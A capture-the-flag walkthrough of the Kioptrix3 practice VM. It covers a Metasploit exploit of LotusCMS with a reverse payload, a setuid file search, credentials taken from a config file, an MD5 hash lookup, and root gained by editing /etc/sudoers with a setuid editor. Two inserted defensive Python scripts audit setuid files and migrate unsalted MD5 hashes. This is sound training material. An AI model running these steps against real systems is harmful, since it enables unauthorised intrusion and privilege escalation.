Code name: Kioptrix3
VM Download: www.kioptrix.com/dlvm/KVM3.rar
Challenge: Get root on the system
First of all, let's see which ports are open.
# nmap -p- -Pn -A 192.168.11.11
Port 80 is open, as usual; let's browse it.
Ligoat? Hmm, we can dig a little deeper.
Jackpot! So LotusCMS, huh..
We can search for it in exploit databases such as Metasploit or Exploit-DB to see if we can find something useful.
msf > search lotus
Exploit found? Let's try this one. After selecting the module with use, we set its options
msf > set RHOST 192.168.11.11
msf > set URI /
We can also set the payload and edit its options
msf > set LHOST 192.168.11.7
msf > set LPORT 8723
And then just run the exploit
msf > exploit
Now we are in, but our shell is not privileged, so we must find a way to escalate our privileges on the system. One way is to look for special files that always run with the privileges of their owner (setuid) or of their owning group (setgid), no matter who launches them. We can search for files that always execute as their user owner with:
$ find / -perm -u=s -type f 2>/dev/null
And we found an interesting one: /usr/local/bin/ht
But if we try to open it from our shell…
Damn, we will need a fully interactive shell for that. ssh will do the job, but we need a valid user and its password… we need to dig deeper into the system.
A quick look around the web's public directory turns it up: as the webapp runs on PHP and MySQL, the MySQL admin password is stored in plain text inside the webapp's configuration file!
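The find command above is the attacker's view of the same question a defender should ask routinely: which setuid/setgid files exist on this host, and which of them were not expected? The following Python script is an added example written for this walkthrough, not code from the original post or from the Kioptrix project; the EXPECTED_SUID baseline in it is an illustrative assumption, and the SAMPLE_ENTRIES list (including the /usr/local/bin/ht path from the walkthrough) is constructed so the classification can be checked offline.

```python
import os
import stat
from typing import Dict, Iterable, Iterator, List, Tuple

# Assumed baseline of setuid/setgid programs one expects on a small Debian-style host.
# Illustrative only: derive your real baseline from a known-good image of the same build.
EXPECTED_SUID = {
    "/usr/bin/passwd",
    "/usr/bin/sudo",
    "/usr/bin/su",
    "/usr/bin/chsh",
    "/usr/bin/chfn",
    "/usr/bin/gpasswd",
    "/usr/bin/newgrp",
    "/usr/bin/mount",
    "/usr/bin/umount",
}

# Constructed sample of (path, st_mode) pairs standing in for a real filesystem walk.
# 0o104755 = regular file, mode 4755 (setuid); 0o102755 = regular file, mode 2755 (setgid).
SAMPLE_ENTRIES: List[Tuple[str, int]] = [
    ("/usr/bin/passwd", 0o104755),
    ("/usr/local/bin/ht", 0o104755),  # the unexpected editor found in the walkthrough
    ("/usr/bin/wall", 0o102755),
]


def scan_setuid(root: str = "/") -> Iterator[Tuple[str, int]]:
    """Walk `root` and yield (path, mode) for regular files carrying the setuid or
    setgid bit. This mirrors `find / -perm -u=s -type f` but also reports setgid."""
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        # Pseudo-filesystems never hold real binaries; do not descend into them.
        if dirpath.startswith(("/proc", "/sys", "/dev")):
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks while scanning
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st.st_mode


def classify(entries: Iterable[Tuple[str, int]], expected: set) -> Dict[str, List[Tuple[str, str]]]:
    """Split (path, mode) entries into those on the baseline and those that are not.
    Each item becomes (path, "setuid" | "setgid" | "setuid+setgid"), sorted by path."""
    report: Dict[str, List[Tuple[str, str]]] = {"expected": [], "unexpected": []}
    for path, mode in entries:
        bits = []
        if mode & stat.S_ISUID:
            bits.append("setuid")
        if mode & stat.S_ISGID:
            bits.append("setgid")
        bucket = "expected" if path in expected else "unexpected"
        report[bucket].append((path, "+".join(bits)))
    for bucket in report:
        report[bucket].sort()
    return report


if __name__ == "__main__":
    # Real run against the local filesystem; anything under "unexpected" deserves a look.
    live = classify(scan_setuid("/"), EXPECTED_SUID)
    for path, kind in live["unexpected"]:
        print(f"UNEXPECTED {kind:14} {path}")
```

Run it periodically (or from a configuration-management check) and alert on a non-empty "unexpected" list; a stray setuid binary such as a text editor is exactly the kind of entry that turns a low-privilege foothold into root.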
Nice! Now we can try to log in with these credentials. We can log into phpMyAdmin, which we found earlier using nikto.
After looking inside the database's tables, we found two interesting entries.
Looks like the passwords are stored as unsalted MD5 hashes; we cannot decrypt a hash, but we can look it up in a public MD5 hash database.
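Why does a public hash database work here? A bare MD5 digest is deterministic and unsalted, so every user who picked the same password has the same hash and a precomputed table answers it instantly. The script below is an added example for this walkthrough, not code from the original post or from LotusCMS; it detects rows that still hold a bare 32-hex digest, shows the linkability problem, and stores credentials the way the application should (salted PBKDF2-HMAC-SHA256 via hashlib). The storage format "pbkdf2_sha256$iterations$salt$hash" and the iteration count are assumptions of this example, and the sample rows are constructed.

```python
import hashlib
import hmac
import re
import secrets
from typing import Iterable, List, Tuple

# A bare MD5 digest: 32 hex digits, no salt, no iteration count, no algorithm tag.
MD5_HEX = re.compile(r"[0-9a-f]{32}")


def looks_like_unsalted_md5(stored: str) -> bool:
    """True when a stored credential is a bare MD5 hex digest, i.e. table-lookup material."""
    return MD5_HEX.fullmatch(stored.strip().lower()) is not None


def legacy_md5(password: str) -> str:
    """The weak scheme found in the database: md5(password) with nothing else."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, iterations: int = 600_000) -> str:
    """Salted, iterated hash. Format (assumed for this example): algo$iters$salt_hex$dk_hex.
    The iteration count is a tunable assumption; raise it as hardware allows."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    except ValueError:
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


def audit_rows(rows: Iterable[Tuple[str, str]]) -> List[str]:
    """Given (username, stored_hash) rows, return the users whose hash must be
    upgraded on next login (rehash once the plaintext is available at login time)."""
    return [user for user, stored in rows if looks_like_unsalted_md5(stored)]


# Constructed sample rows: two legacy users share a password, one user is already upgraded.
SAMPLE_ROWS = [
    ("admin", legacy_md5("example-pass")),
    ("editor", legacy_md5("example-pass")),
    ("alice", hash_password("another-example", iterations=50_000)),
]


if __name__ == "__main__":
    print("needs rehash:", audit_rows(SAMPLE_ROWS))
    # Same password, same MD5: the rows are linkable and one table lookup covers both.
    print("legacy linkable:", SAMPLE_ROWS[0][1] == SAMPLE_ROWS[1][1])
    # Same password, different salted hashes: no linkage, no reusable table.
    print("salted linkable:", hash_password("x") == hash_password("x"))
```

The practical migration is lazy: keep the legacy column, flag rows with audit_rows, and on each successful login recompute the credential with hash_password and drop the MD5 value.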
Password found, now we can login via ssh
We are in. Now that we have a full interactive shell, we can go back and execute ht.
It looks like a text editor, and since it runs with root privileges we can try to open or edit some interesting file. Two interesting candidates are /etc/sudoers and /etc/shadow.
After opening the file, we can edit it.
I've edited /etc/sudoers and granted all privileges to the user loneferret. Now we can just run
# sudo su
And get root